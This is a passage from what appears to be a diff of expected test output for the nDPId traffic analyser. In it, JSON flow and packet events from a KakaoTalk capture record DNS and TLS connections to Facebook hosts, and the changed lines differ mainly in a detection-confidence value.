+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069031017,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.70"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031042,"flow_last_seen":1430069031042,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1430069031042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031042,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADx6qUAAPwYA7AoYUrwfDURGqj0Bu4p9cZMAAAAAoAI5CJu+AAACBAV4BAIICgALCzoAAAAAAQMDBw=="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1430069031079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031079,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwwtUAA+AaR7x8NREYKGFK8AbuqPWAZ05aKfXGUYBIRHOtUAAACBAV4"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1430069031083,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACh6qkAAPwYA\/woYUrwfDURGqj0Bu4p9cZRgGdOXUBA5CNrpAAA="} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031042,"flow_last_seen":1430069031083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":565,"flow_tot_l4_payload_len":565,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069031083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031042,"flow_last_seen":1430069031083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":565,"flow_tot_l4_payload_len":565,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069031083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1430069031167,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":85,"pkt_l4_len":49,"thread_ts_msec":1430069031167,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEUAAEAAQBHSFwoYUrwKvAEBD7EANQAxznCJ\/wEAAAEAAAAAAAAKZGV2ZWxvcGVycwhmYWNlYm9vawNjb20AAAEAAQ=="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01034{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031042,"flow_last_seen":1430069031203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1845,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1430069031203,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -01824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1430069031042,"flow_last_seen":1430069031220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4136,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1430069031220,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +01034{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031042,"flow_last_seen":1430069031203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1845,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1430069031203,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +01824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1430069031042,"flow_last_seen":1430069031220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4136,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1430069031220,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1430069031221,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":144,"pkt_l4_len":108,"thread_ts_msec":1430069031221,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAIDtrgAANREvLgq8AQEKGFK8ADUPsQBsjjKJ\/4GAAAEAAwAAAAAKZGV2ZWxvcGVycwhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAAA+oABwRzdGFywBfANQAFAAEAAAPqAAwEc3RhcgRjMTBywBfASAABAAEAAAAIAAQfDURU"} -00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069031221,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}} +00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069031221,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1430069031230,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":87,"pkt_l4_len":51,"thread_ts_msec":1430069031230,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEcAAEAAQBHSFQoYUrwKvAEBOToANQAzWvOyogEAAAEAAAAAAAABMgI5NwMyNTIDMTczB2luLWFkZHIEYXJwYQAADAAB"} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031236,"flow_last_seen":1430069031236,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031236,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1430069031236,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031236,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxjDkAAPwYYeQoYUrwfDURUsJsBu8tPaEMAAAAAoAI5CF29AAACBAV4BAIICgALC00AAAAAAQMDBw=="} 00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHLtrwAANREvOwq8AQEKGFK8ADU5OgBeI2eyooGAAAEAAQAAAAABMgI5NwMyNTIDMTczB2luLWFkZHIEYXJwYQAADAABwAwADAABAAAEYQAfEG1xdHQtc2h2LTE0LWZyYzEIZmFjZWJvb2sDY29tAA=="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069031281,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031230,"flow_last_seen":1430069031281,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1430069031281,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1430069031281,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031281,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACw2WEAA+AaMPh8NRFQKGFK8Abuwm2JwnlDLT2hEYBIRHOBVAAACBAV4"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1430069031284,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031284,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAChjD0AAPwYYjAoYUrwfDURUsJsBu8tPaERicJ5RUBA5CM\/qAAA="} -00981{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031236,"flow_last_seen":1430069031286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":570,"flow_tot_l4_payload_len":570,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069031286,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01039{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":161,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031236,"flow_last_seen":1430069031391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1850,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1430069031391,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -01829{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":164,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069031236,"flow_last_seen":1430069031408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4141,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1430069031408,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"developers.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., 